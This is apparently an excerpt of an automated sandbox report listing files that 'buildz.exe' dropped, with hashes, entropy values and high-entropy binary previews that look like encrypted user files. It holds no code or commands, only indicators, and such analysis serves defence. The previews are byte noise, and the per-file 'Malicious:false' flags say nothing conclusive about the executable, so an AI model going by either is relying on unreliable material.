                        Preview:!func..,m..z....so......l.w.#.....UUn.#c....\.......%.Z7.Y2;`.....:eO....d....R.>..."{PC.J.I..K.o...g..V6.i....#.m=.6.@.4....s).......P.})R...+.+.)W#....T.7.a.A....q......g.#K.0..)..-D...u.^CE.+}+wT.9..T}.Q..0.GM.}..e.\.....#.j......z..l..F...6...<..b?5..d..%.6qW.......|x....m...)..].......8... ..f.,....3g....!..i$...]A....?.;.BF....A.:.@...S.cc....6............r~.. .P...8%.[.N0...tyK...& .F..h....Z.pd...y!8e.....)...O.4.">.%].y.I...Qs.j.u.f=.....#.....`j..W.\.`..I.../.M`...d...H..P.0..`{..=).t..'].}5..Hj.l*.."0..aM<x.Z<.lr+.`N...~..[.k.hx9....ka.......tF........9K.o...;.....pv3<p..oQ{....|..u6P........x.0..Z....d......M/{...sW..:.j|]n.u2OnH..j....r.Z.:...8..8v.y../D.V.Q5-..Qx....z.Iu*._.2...y.....G..-..E...(H......`Q.... .L..8.y.#.6.?.0 ......y..T......%f.):.N.6....P&.u...%...}>.......^..W.......hVO..4.F.#0.....{q....P1.m....&..$f.+.6...=..`Dl....D".i)Z.J...+....N.F` .b....cD{.B....|.......;.*.W..q.R.Ee9...1..K...X.)^......RF.p.}.X.....U...Pb....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.248763948866726
                        Encrypted:false
                        SSDEEP:6:Sw8AU6Yk1WhvzV0gnSfCvM+D7OicFKX7rVCINm5A6Wp2tn+5u5p/1/Mr8FGcii9a:HX1Ovz7dk+micY7JwWpVg26Gcii9a
                        MD5:F9EA8A9314CA7C4E11504ED21896C6AD
                        SHA1:C701F610473095F57CAF9C2F1196F05EFCDF115E
                        SHA-256:358D89FE3AADC08E4B26497E719BB7178C21E092D3B972AB013B63E5F04DF885
                        SHA-512:58B1667DBCC2787A52AB347A0D66606E8AEE0B7D5D46C770C1FEEACA00A7E80DDED22A1E24645F1F32CC14D6ACDD855932FD095262092831768CD9831EFE5A47
                        Malicious:false
                        Preview:1.BB7......N%.3..`97....m7.F.?.u..u....9...........5jpI.p. ......0..Nb.j@.{.Q....r3..,u/..^Q...^...;.A....0/...I...".....B....i8!h..X8v..b*.yBl/?...o...*]..L.>7.g.]^v.r....!.C.\W..B..y..6.....<...r..`qU....l.}.....[~...E.d.;........@A..}..x`&.n8..h.jW.(.Jn..=..N#y.U....s41.(.b^X..E../..`.G..s.{EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):419
                        Entropy (8bit):7.374309277564304
                        Encrypted:false
                        SSDEEP:12:vpx6u5Vv4HUlrf5g9HQbMrcdAMLf2rC26Gcii9a:vpsuf4HUVm9HQgrcdAkOsGbD
                        MD5:172298B9C456D2474C1E7FD9EC54D787
                        SHA1:EB4B7F3EFC3CB2FF78CF1580EFD61CBA4E9D4C1B
                        SHA-256:EBD083489BB667AF8AF27AAF4DE8791161580526246D835BC06F710E38BF182C
                        SHA-512:B0D0D9D2B9E4CEF52B1243312CD681220F321AA126A3F612FAE25EA23361274B9CD7D4244EECCC4FB0CB2745C5CCADE072013DD0FEAB76E2DB16868FE24E0696
                        Malicious:false
                        Preview:{. "P..P.w66.........x....,...l.%...^.%q?4.5W~zG.>.....6cd..'g.3.....U.qV[X..g.U.K!...k].;.r.K.2.{...0:......ms... p&./.....c..?k..b:,...,.1o.Ku......3....xd.*-#.5....F.U..9...D.|!...ylI.q...S..k.eNKV..4<.iB...>..CH.}...5v..........X.?....n..C...s.^..1%l.M.../.........T.7kMr=*.b.#{.ok....4.{l..-..WF..@nm=y..^...Ncj..7..?7..'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2203
                        Entropy (8bit):7.905399869826783
                        Encrypted:false
                        SSDEEP:48:0vbzriGVIkN5lnytgcLZoYX+ySrNOdLZ4ZUD:SbzVIk/lnytjLdONEBZ4ZA
                        MD5:8B48BABE3920FCAC9A5603EFD98EF315
                        SHA1:58D177C9E59FF6EC2A5E453D17439FEE75892946
                        SHA-256:954CEA7F029F103AE5D1B1B1B5BDFC367CDBF3AE26D1AC12137D45919BE1E2BF
                        SHA-512:8EE7D27259827D678F10F1C20983EC3550DF2BCA85C53138EA1B5D9DC34B1F52214608C9A9B5FE97E7C25958DC0F18467EE8547346612B6622388D86859EF9EB
                        Malicious:false
                        Preview:<?xml...x8.....=%t.%.d!}....c...-..Tw>8..m...H...r.|..7%.k....Y..w..h.r.,.G...Ae........+.....'......*.\/.e9..h.u.l6......T....l.o..5. ..N6IIA.F1..8.$....Q.../E...fta4]..H.).w.OY..z...."..2N...f.i...%...W9..c..9c..,$..|.....j................G.~.kj....u ..&{..6...P..5......a.[...;J...w.-.Iw....QTxL..3..3Xk..5./7...B$'.-W.{[E.9.K9I......%7w.A..A.r.G.4...m.U..e<BtZ..@..a......a{..^.{IV.W..|.......:m.i.)0../J......L....AM .A.|.......n..O....\....H...2t...._O....i...F.h....G...`P.+3....C.\l.+0.{....1.J:.8iP\..........x.,+,..|.K.Q.&.3..I...>.O...h.T....|..........o.n........C..A..b.\... .T.h....F.^.:P[0B."N...L.?..D.r....{.q..'..l.I.....F.a.2.s.WO....V../[).S..k.=.......l...}.On..C.....[{...t..o....rx.p.7O..S.0.....F...I......-........^/.l..)s.Km.....M....6.........{.q..N.....Y......2<.].`.-.nrYS.}BM]...b]1J....~a..4}.|....#...y......K.|.....X~..e4=.'+.>.....-t(Y....{2.....D.?.H...X.s.. .:!.j... .P....J....l....S(,.(.r7.%..{.n..&....5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.981681632097774
                        Encrypted:false
                        SSDEEP:192:K1pGUHghPSBFT0FLoHSH0goyKdbM4WdYLqDvPxpFi4FA8A:KWRPS7YBoHSH0kcbMJYuTxpxA
                        MD5:B8B3AAC1A89D8C7FEC5EC065947C4729
                        SHA1:48B19C49A7F7F99C3749141DDB438C076642473E
                        SHA-256:05CD341B6DAD61165ED1171867E8B2549AADA53A52E1C9ECB355EA4E459991CE
                        SHA-512:EF97278C982A09E3B50CC62B13A6EA1895E22160BE2771649325A97D5532C85EAF90EB2F748B7DC16DE0E85D141D8415A28D49FAF4179BCBA592559A9616CD71
                        Malicious:false
                        Preview:..E..A....xE.=Y....^.Il....2...A.......%W...M+.5.m.r..o.|...Z.KJ>I.....-K. tb..X.n..9.iz..3..5....`...(...\ee}.....pf.....D..>.._+t.....'t..iQ.I1.......T..b.).@!..........)...._O.'....v7o?L.B.....y..c.*..&..#...._...8.......g.lk(.).MW7t7&..k.].....Z}.{..!.(#J..J[.k...f.i.&.9X.7.?...EA.e_G...r.$..,=...4.......H?.s...........J_.*.3....M..9.fD(..6#.G.|K.0T.o..8%...!bb4..I........g.-..PXtw.l...T.~'....$.5.W.KYr..5W..u.qC1..b... ...2..3S.e.H...@...Y..2v..A..-*W...sk....9f...Z......K.2.`.I8.:.u...Jy\.V..n4..{.....^.sLW(...K. ^.....K.....V'$...9@.:.+...~.k8qh.|......R\.T.....fx.M..*_.*..\@.=}.?..~s5xO....2..p..:..]..x.v..............o.x.D-g..H-X...G..Q$F.h.M#t3..."...]..de...........c.l..Hl.;...l.....`.u.y.d.<=?D.4.0"}.R.)..~...wK0.sA.wW..S_..X^C2U. ....T.u.c.0....y..-*..`.......C........!..8..Z.......R>1......g.k........R*6....6...U.n=[[....H....T..wn...C..2..... ..r..[..?..:.>.4."-.......".1...[.6q4.q.`......=W..Z..,.._.>:.k.7....~0.Dgq.|.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.960202182067216
                        Encrypted:false
                        SSDEEP:6144:AqTXI7bzXVxVH8/JGbyXH485w9uJydeVixDeBfh5:vXI7bzXVE/JMyXH07de0xDel
                        MD5:FB745C26AFD93E18350C1CE3693D94AB
                        SHA1:9F33467C263B0175CC29BE76458A306C2CCA468D
                        SHA-256:4596B04DDBC63ED5468CDC85C0F9D24AF4F523973B14E30E09BC0F7EEF652154
                        SHA-512:7F2B293DA8407144BF874DD7E05DC031140568BF5474B96BE0BB31B59E3FD3DEC17A429AC821613B7C37D7D76F878D0CA4ADBE4F343D7CBAA03CD1EFD83E291F
                        Malicious:false
                        Preview:?.8T.V.CSr..L...8J"A...;...}Vn!u.z:...'D..v.......x......"/;.U`..6."vN%{..c...7|+b...Q.._.$0..S.....9...C.@.......E................1X_8..f..p..Lv..b.Nw.J. .......;..$..{....a .......V..{4.k.....M.q....k3.U.`|.Yad.O`...r.X.$Zs..F. .q.=....X...YRA.m.-....O..S..t[.....X.M......[..w..aw.+.V..{EF$%].SN."KQ$..7P..H.9........1Y..Q.."p.R...(.j.e.K?....@.l.W{^...:..Vk.CC.....,Z.$.....;{.....T!...lN..Z.X..b.R......b.4.6..c.Y..m).G?.tz...?+..~N0+C...L..x.Y..z`a.,^...}..oR.3yQ..D....8F...;...&.~%4)}...X..BN.c.....@...S...V;.p..KB..k...d....Ls....1.....C.j]....i.....]0.0.~XS:....q.m.8....p0R-...[..o.../B..0@2F.....%1'..<.#..p.Y~..`./P#t.5..{....,B...=...p.n.@..a%.>r..~.....ir...<:..F....>..C..N7.q..[.?......hz...!..n..G..).\:f.E....k]...D.C..~.......c.*..A..ruL?+.E.U....=;...iO.....wX _.M.....3KL..A..y....A.f..a.G.m...A...E].XW..w..+DO.....ew.l..Z..:I....pm._Y......r.5C...d.J.3.0............J.'.#U-.O......."+BXs..m.d...*0..x..0..`..{.B.Chg^..S....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.207588361520377
                        Encrypted:false
                        SSDEEP:3072:1VxJYFtE/I0Jxda5NeXomhQkO40ylY2AYL5umEv2NpWzFevwDfA:1rcC5/aFymX7YNuj2NUFewM
                        MD5:F91766C5DE8621E6C511FBE3C02444B3
                        SHA1:9070C7AC941BC5CA6293A1520F3034FA682362DD
                        SHA-256:135BFF5DB162CF6F2896CA36E878E13BD2A45ACDA373BCF28763F3FC29BF18BE
                        SHA-512:0B60B93FD21005182BB93A9B9F658A4C266EABBA2D63D7ABE7690E2B0EA100DDCE00D04C633BAAAD2588BB82B29A95C74AF6E121115DC6EB72F77D92A9FE979D
                        Malicious:false
                        Preview:.....T..my....z.,....xrwr.-o{...4..-]j...@..z7..S<.y.X.l..b.y..Z..*..V{[l..s...3.19.c.+.B..<B."..-(.k<A.D.>_....f...}......=.y.'.Co.....K.....?. ..'. p...;.{..5XVI.^H.....)Ds..M.\.5...0......i:n9+2.9]..y!Y..d.B.........a.TD...|....b.".S..U{,#.?.W.ds.e..e.)...&....9...D.a.?#.... N.K...........G[8j....T>]93..7e..H..v_.r.G:.|1..-...QW.s.........|...B..c.$_.....K8F.S....d8.+..[....%.G....D.We.S........?....B.m.g..Xy.!..U.bkE..}..r..........|.....)?K.....L .F....|C.l..E....2tmT....,.#6UnsW.).r.ZLt. e.1.s>... j2.]......|....O....3..hz.....O..z4..Z...x.u...U......+...(.3{..7j.)....}.......[<..Ufe&#{..R..2i...%8..C.Z...6x-/.*..{...j.'...[OW..6]x=..ex...:.m.^..$....1.+.....$.?Rq..R{..DP.....:...0yc.`.......+..T..1`.....V.L.c.Fn-..&.9.?.<...Z....p:.*........I./..M.l..........J3R.....".j...R.x..BE~1...Yn............%"F...4.qlE../U.l1...}.6M.V..V..c....P.^......(.87..k.X...[.......C..!.h...3@..yA....&..L.\.5(.......{..:>..\xP.&.......|.b.*.B...@Pv.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2080983432969656
                        Encrypted:false
                        SSDEEP:3072:c9oQXE7gO2a/Wnus70nduLDpZ9dtdYWUMRqv/zqgZ2JGA:c9rUkO2ZnJHpZ9dtdYY+7qgZ4P
                        MD5:8E549DC98D2AEFEAC5E0063FC0FDAC10
                        SHA1:62FE0D25AF8979A4B3C559AD8AF461950F86159B
                        SHA-256:0C74BD34D8542633A98AD56B6E7D2BD1201934D12FB013168F6120EADBF6D45C
                        SHA-512:1595BFD15655728B132846B55420D52124E8A35E12848869C2C56257A121EBB6DC37C0FA68E4837EEF6CC6CE3034E03F61459BABD493FE46171691C0DC817BDB
                        Malicious:false
                        Preview:......>.x.]...WT.E..4..5.?.?.:a}.......(..@.d.6}.==|.{..........Pr.xB[...eZU.=$...T.............2j.S!.....wrK...2.....K..H..[.dX....U.v...8;.@.R....+e.?../.ze.Qm...L.70Q.g.....d..S.....c.2.. gI..r...q..(....Kf.q=....5.}vu{Xr..%wR.V..G..7|..Y..s.j)3........_..|.E'.b.c...S...i...o...`.Hi..........X)=....J.e......I..O.\.K..(%.`.P<...1..9.....!...nFaF$........e.X.n,kl......6.,.G..JI.o.<<..`..AB.#).....O.V9.......hu .4.f..?.6..o...I.s>6J.....2..K..J.0.TR.D......`La....$Ht.<Lp.)).<....f+X....lq.&%.?Z...X..|C*.i.G...6.y....p..D.c...6.j.H.....hN.L.U...e2..a.^.&,...G..r...\...+.Wt8.0A.%b..}. _..5+.j..T.IW...i).l>#..U........@.>[!../!da.'m.j.g......O..p..{.;..%/.h...'......*....wR..U..@...o.'`...S..yl.J......p..]+a.Y.\..E?V= ....n^..@.$)bT}'...s...o..I..T..rcj..Eg...........R.o....+#..P..........Q..K.c.p7..!...K.l@X;..Vl.y...e..-R.... R...foVJ.c.N).zW....f.v.Y{..V.BR.4]...'...J.=...m..~..d[.f....`..M......._...366_...._.#.Q:....O..h.".........r
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2077684122043957
                        Encrypted:false
                        SSDEEP:3072:r+iZdygzWxvckGATPsKmQZOxI5gwGas72ZIo1zjdOHCAIw6N56A:rdYIKckGAJ/R5HGasShda4b
                        MD5:F8152AEDEF153CD7705D186F7C702EC2
                        SHA1:76C4646E75331D9CB3FCAA8A15D575CBA72F1C97
                        SHA-256:11C5DD8BE94B2507100DFFAFE2D56E96A3B6E91FF660523EB0A79B653F44B04F
                        SHA-512:F0123C3A75A641AB204DC30A4D3E61711ED111FBD1755D5A49DCC91BB8BCAE7546225C3B58DE76D33D7941C4BD57D0F778361A0C8ECD3E20CE7285DD42DECD1F
                        Malicious:false
                        Preview:......l..`.K9..J...B.P.`.../..;.+....C@....xu........X..N...U.&...o....Y....6Ez`!.QO N..ib.[V........U.&4Ai.C......^6R.^ra:d.Is._Y6*.b......}-Z....h.h...6..WG....,.$o.2i...#..q.C4........dv".-.S.#)..{....zw.^......T.S..*.UVe.P....9.......4^.K%..".j.$?....$..zI....n.WNw..|..k)91...j.H..m.tv6....M.c...yN)r.Z..1.<.:S..d.X7.".;......l.F.+....L...Q...w..T...:.=....C.N.o4....d.%.....r.?.Fw.<.W(...%..r..RVs..V.eH....\..t).i0../......a..yw...I.......B.."..N<....4.[.w.A...r.n...%4x_..b.%...:...5...i..,.Xd.Q.{Y..A.G.e&z.U...hOY37e..#o.P.>s.......A..]S.....W)J9[x.hI.=xsai.4.Q2.....E<....5E.....?.]Rz..`Z..$..i7.;......%vX7W..E..1.)2.A(B...4f.....)fK.Q...\...O.2.9<..s..v..m.I......b'..J!S.t`....!......j.......]./E.,p..C..Y..|.+...x.....k.. Q.............on.'8.~...~...6~....H......Xp.Q.W.]asN.Kp(..V8.B..n.../..I..W.u...q*.B......_.~.`....=&....;....2.<%..dA3.l.M...M.y\`.[...B.y.'.......hff.i..).k.8.k.D..P.%..l.h....D|...<N.k..R.....x.%K.D.iBn@.|
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3384
                        Entropy (8bit):7.938836981471465
                        Encrypted:false
                        SSDEEP:48:r2K15qJUE1Od+DXWUYwSbQDYCxG9V7h7vzF+UOdkH+BBg5aFgJEZ/I3av6RmsCpG:wo+bR6cEt7vzFYFqsAEZ/466RmTpRA
                        MD5:A51393D4F54F50C1CC2DF4585BD79FED
                        SHA1:687A1FE62B47863F194C14EB97B84B9DD331D895
                        SHA-256:122727AA4B6768B8B6B20037D79852360B91726021EA0F3D668E9E2D927D28FB
                        SHA-512:A4DE07442C4095FF49F4ED3F0D2C249EA83B9FB74CA6A89FD0D6D8D72649CF6DA453C34A4F2C64AD6DE7F7281A97AACB2C18DF7A3C45C31B52B16B7B2EFA23DE
                        Malicious:false
                        Preview:<?xmlPX.\.i....>x*=.X..n.!.q.q..f..NN2_.....my..%.2...8.C.....a6o..1..1B9...+..c.Y....t/.w{..;....M.&......~...|........w.0...l......8......\..p5..Z`.~.`....:n.7^.05..9.t..T4..-.,..........l.B%....j.[...,..S}.F.K........T.L0.oqz..........0........7...@{?.._......:.Ks...4. .....:.P...r.M..J..]......4w.s.o..PG..%]{....=....I..u!...W.L...8..x....E.2...)....X..Pa..3.F...4...Q.......Wd1U....?.....B...TcD=...:."..$.&..o.i..1.u...........z.f:.....S.....\{6..Q. r..ui..p..wH..^..*....[x..n!.@.=.......^..YM^+=Z(.0......pm..w.x..1.;.~o89".>\./....?OfB....x..w6_....".......'.e/.q.......w;J...Y..P..x..n.e.H..b.. ...c.U......./bD.n..v .Q...tn.....^....r.6....qRy... ..WnK...g...u..X8}.l)&<...hI.E.[.K@...6f.|...+..^..h.......R.Y...... ...P2g...}.L;PJ....>..p..Q.^.6.HY.K.fm.Vh....h...[SJd...4.)...wj[.......z4.X.Z..B..^uca...".O..ms...l....{.;.....:N..-.'.{H.@S.9..}...9...as.....,......h.f.......SS...j*..P6j.A.&...i.qd....J....f..$..~&7W.sS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1062891
                        Entropy (8bit):5.530132663642558
                        Encrypted:false
                        SSDEEP:12288:v57Yv66SiaXSZlV0N8x5thr291gess3TylunXc:v5Uv66F
                        MD5:9637D234A77E0C2977A72DAEDB4AF103
                        SHA1:3917E62423A97416E7CBBB60DBDE6ECC0DB19FB1
                        SHA-256:1935E989D41BF990912902B60D09D67B35A743EECD5258CAE83054053A94EF62
                        SHA-512:211BAC77BB0676237DFD37B4404367BB563CC30231B2FE4FCC0BD30862F31149F43E3C62E081B16F9517055A5D18ACB2F141A7D250CCBDEDECFE2C48B878A483
                        Malicious:false
                        Preview:<Rule.e.6k.!..h....I..|g7.......................*%...^...6....L..8(..o.....w.1....'4..-......U...n........; .8H..#.5.<.c.,>.~.`6.?.Ir.w.J..d.$.-Z.....t.q.......&.....!..O.Pf . .~..xE....7......^...`.#....F......y...uc.OJ...B..|....z5\Y2..|O...{Z..R.Y..7A.DfW..Z.dr.kT#?..vr..dy7.G`.<n.OB.;..H..b..Q2...8.P....Za#~.=F.u....|qN.A.._.....M2v[........V$G...;;g2W.Q.<X.|7...c]..P..A.`H6...T..k.....c.D.......D.G8..3....`......v....Iy..$..7$...l-5...4...m|aj$....~.....[.i.*...."..'........SvP...<'.....v..;.!.=...Y..#.j.*..l?...W.g.S.,}.YHVe...I.Y.L..Z.5..7?...6...........l.......*..!...%1cz.m2...q...LC|.g..U.-..6.'......2...Q_@...E..KQ..sQ.@.u}.Hi...2z`..n.5.$....bA......7.......y......E...~....|.l*.^..T..Qp....s.L..2._=1i.N.J.T....I<.}..+...L...g..;....L~m._.G...-..o..,......7}... v(Z..Nx..._...3.g8....s.....W#.......&!.....7}9.....a|..9f."..z.J.|.j.._...G.(....C....z......(.U......T.m.........k......^/b.....K..@O=....#..#_.D.../....:...a..*.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1716
                        Entropy (8bit):7.87387364090939
                        Encrypted:false
                        SSDEEP:48:VyrmO4rSIQzcrB3t12ZTZUwERvcAeOQUD:VyrmDrB32ZTVEGFOQA
                        MD5:981165104B3A48A67FC6C4F14DF292EA
                        SHA1:D61F12852D24E6217A7C61990E867935F3115193
                        SHA-256:C6379011EB4B18D8687FE89DED920B631D90A7BC5732B5A8F00E492CC063D493
                        SHA-512:5F0461F30B22820A0C25142BA1DE81C55B27D285D46D6DF5FD4797B2ECC9DF4AD0D0A2871B91D018470536766B84F705798DA4BA8D137D15147A9E27F5E602FE
                        Malicious:false
                        Preview:<?xml.Q...O7.U..G!q.?..ymNz....[B.....<}Z..g.....+L[..O..F..7p...9O.....D......#..U!o...%|...H7n8*O.?(\\.....nm..t....u...b._'..O`{V.`..O.;A.Q.i/...d.i.Lb.o."5....A..X.]a...._...74...C...%.+o.......i.Y..*.....#...c.B'.-.n..A%....6...y9..+..l...'..... ..~%(..=.x#.[..).n.s..f.UY/..*.\..;<...S..xP....4.9...Be0Q.;cm.V.n.k.N.B>.z..aEt..XZ.<...m..Z.p]D..m..P....\..y}...$.6Bv.....v4.j..c.44.;+.g.=.}......X.2.......B/......D.uM..@..v..Gp....{.f~L...iR.b.1......U..^M.$.F.IuT..8.>R32...Y..J{+B...}.p.7.E.:.g.O.[.k.......(p.L....SGq.V.j.|Xt.E)..(F.8Y.9...PhF...M.....$2..W.....<.\.&L....p.3.X..W;Q.....Z^x..R$E...*..1..|..6.8T...G.E....?.0...),v...../K.Z...G.,c...i.b.9........{7j..+.%.o..........z..G...Fx.J.D......CN<....Bh..fS.l.a7*I.........Sd......F+..'.Zm.a?.$.,.$.....O..M1.3..|..;.,..d...@....'! k9+_.Y....^\.I..."9.I.m..t........U..vN.k...o.r..M9.l.,+.*....=Z..1..O9$.#..J...d...,jI..g..N..w.B...w?........\0...7..S..~..%.d...w ...d.)1*e.6..,....H.9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1737
                        Entropy (8bit):7.874157059767498
                        Encrypted:false
                        SSDEEP:48:UJb1J/XCZwf59woet5WkBHf/xOK2uHnj7K8xUD:y1J/XCZwR9wDt9BHxjjH/K8xA
                        MD5:1E2324BF0195FF742BC0593CBE122416
                        SHA1:D70938B670FD7C105FBEB2E37BFBCF2ED70FD460
                        SHA-256:1D80310108D7766EF895B6191E21C4C7D777E5B4C18A3B3078C7F33CD9E500CA
                        SHA-512:B6BA59CCE98726B967DD01EC008F144339EEFA404F4B3F7F420A13B21EF933932072F4515C63A7119D8F43BC9A359644916634F38A0483D62EEB9D3D11634381
                        Malicious:false
                        Preview:<?xml....Z.ARR.@.F.m...qA....Iq..L.P....>..K.....@....|..R...z.C*....}]0.I..I....,..]k:.u..w....R].U..F..h...S.}..../..H....i....4....L.w.,.L'....d~/JkC..I].....ND;F..6."^..8p...ay8*.......d._.*.....6.5...9..+..^...}..Y7.!.YlQX`........1.-`...%....`.....W...4..D.....Y....o}.3_.......)....c..G..Q..q.mH.W.g.W..E.H..o..M:...&..h..8..0.P..N]...`s..(T.;..s....4E.]....%:p...}.G....).E.~"..3..V2..........p...e.O.mXp/3..U..K..l.M`...O.&..0Ic....JO3zJO./..4.z.C.....-..Z._....".[/...p:.G....E.+D.$.N..........{5l7...s..2./..E.s.<...2V..#..A..vx..W.~?;.. -..u..&..]........(..uABQ.f..L...]....^....ba.@.$.-._......p../.,..rT.B..?.Z. .gF...........|z..hp...~Ea.....dj1....:>..q..h.>..k...._`EaWf.0..^...F.H....}.\....}jb[.y._E..*0.Z0......(d.7a..s..4.S...-.p..hD..a.....<..W:`k....j(b...J....u....'..C.._..e.....4.KG........;.^..w.I.....e.<I.g|..0@...rh......H.J.......2}....R7...x..#N^...8..3.q..P.`....uK....S.Y.;y..E5)...92n.g..r.6.X!.Z......[\..O...?.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1448
                        Entropy (8bit):7.844913744079693
                        Encrypted:false
                        SSDEEP:24:/VeTxOmUgxOFfsEOAP6wxB8jUuIpfu87fDfjDCdGcS+NEqGbD:/VW/2fsq6wn8AbpfZDfjDC1FUD
                        MD5:0D216CE571F6E9D68078854054F4BFF6
                        SHA1:028BE9D059FE3DD442AD748CEBAF937E1A3D0AC4
                        SHA-256:CDA33ED0A5B1ABFC179320DC72AA6DDD86A490ADEE097103608318CE88E404FB
                        SHA-512:E67ACFB476D2554CF7770DA55006394BFAB54B2BA451F88B51EB43949C44F815DB2904D097594122B6D72F039D19D8CC921C5E7E8D5737DFB84D1171B2DB99B1
                        Malicious:false
                        Preview:<?xml.y;H.l.WC.(.F....+.f........p.....p...U.a.=EWLt.D..E.9....Xfe....+?z..M....+L.."'..U...Q.......Do....W.iT.0..t.i.g.....o..{...wh.9-.Z..u..2\......6..V....)....).=.<N.`..V....V.K......k..(.|2......+u7^.....=....5<..7.|..%*..)oc.[@l...T..u3.am#.8.q.,.....3...(.uN...q..Z..8...........8.K.g.w..,Pr!.....X.."^....|.........L..c.'C./s..2;T.Wp...4.....D$.qw..9.....s(nF..Bn..ReIN..G.......k.Q....e)..fKji.x&....u..D.M...&..g@`.....NxS.L..<.O.E....).....G...9O......'b....7..1....i,...w.E.a..(..*.g!H...O...}...Lf.dN:q./.t.O..s.-.....r.. [.#.)Q..9..x.J.&SO../....P.c......Z.;..^9.qW.C.^.......c.j&.2+Ns.....(...e.bMk..a{{g..co..&..r{Ns..:...\.K..A.J..T`EM.Q.w..6s.g2e.C.........z....[...K{.0.=.?...5.uQp..(l...M...z/S....T...N"....uA.7D...Q..>]@...L.....K0^xB...k.iBFQ.i".K...#/\...e.q...?..2Vc.}M.GY.jT.a:r...yo.#K.HV.....V...k.o..e.P#...V.z.X.......a........a.R.)....H..i....#.o...{.9H............#.U){..0.rl.h........*.E.1~d..]q. ......-+.n..=9.-N];..~.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1419
                        Entropy (8bit):7.856157818251272
                        Encrypted:false
                        SSDEEP:24:flT/UH0cSPpKB5IfDKs+AOqszGr+TURe6ZRG6bT0Rk7HAXZUoDf2uz/mZGbD:flTcHna46rEMdEWAXZUwfRz/4UD
                        MD5:A8E9F7F8118BAAAEA9481472DCE12D98
                        SHA1:509FD7CC8EAEC3B0ACC5D9772A21C9BD5C887152
                        SHA-256:FC012D937D4EBE01592C40B2953412886487576504DEB428EEDA55E4830EDB5E
                        SHA-512:3169B222F4B85F34377C4D5C659A34AF942DF8612F62134E585D20AD599EBBFEF89D96BEA3F596C4E766DF8E9E3EBFBFE49ACC76743339C1A8CDF6D9B8E243A9
                        Malicious:false
                        Preview:<?xml.%....f.._.....R>.{F0..4..y^...b.:.I.....A.....K..h.3...D.dn..(...v.P.u].......=`.WTk.^D...u|....p..6.T(...3...P%;#f?$._..C.}.O...OhS..}.s..cb%..n..y .'..v.+.f)..p....7.........gfQ<3..i..sJ.h..d.1...z.4.....o.j.....&t7.......n..t...&..?. .X.U......\.....Z......J,.@...0aR...w.4^7.m+.g..F...|4}.(,..o.p-..&.Zq..J..b*.....;.?...>...>#J.<..&+pU..9y....)c}.]...h.b.....dp}.3..#f..^... ..g.s....~.x.-.a.....UV.$;....w]}E.p<....T....~.....+fJ. t.%....jK...wsg..~..c..%Zn..#.x.....s.T....D..K.T....Ao...3..N..Ut..M}^y.tGY.6..r....W,.t_.P.....{....}A..';\.G.~...D ...a..rX{.)M.....(i........=......^l...I....b(?.B..^..8..z.#..r.V'..gv......~.J....:... W`FJQ8.<.A.+Q[T.7]..J....x.3hl..Lb\......e$.Q..OY.0...O.c7.k.|.GT......Y.)F.....4S...\,S.%.JJ....b..-..-*1....<.Z\...0..A._......2........7.wm.X..I,.4..qdR5..m.A..e.M.@.KQ+..*.....';..x2.......1..O..o............x9=.}'...{G.d..H/wh.`..-......D.%x.H.r..ubdf.W]=RG;....Kfo.}+./....mQ.^.}.....=.9w....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1546
                        Entropy (8bit):7.889937398526118
                        Encrypted:false
                        SSDEEP:24:mnTevhLYp1+Ryp18wydMStWKiLQmh7ghMTcJxlFkvOfwycgduWGbD:matVRyYtMStWKiLQmRndWwylPUD
                        MD5:7C66A4B36CD774CD3FAC23F844DDC1F8
                        SHA1:1BDDCE866CB10E69BFA2BACDD4B141AF1DC5C56B
                        SHA-256:F47A14E84E15DEEF53B5E9F290DB84BA95435854F7C0E86CE66EB427E3C00D78
                        SHA-512:1020D1F8D4E1CB77D9968DAE4F6FA6E6F7223DB6957005AEBF68CA54ABF433ACBA9002C660B52D151C10CCE2E6B204E3F0EC39EC9A0414CCAB8501D001EF55C8
                        Malicious:false
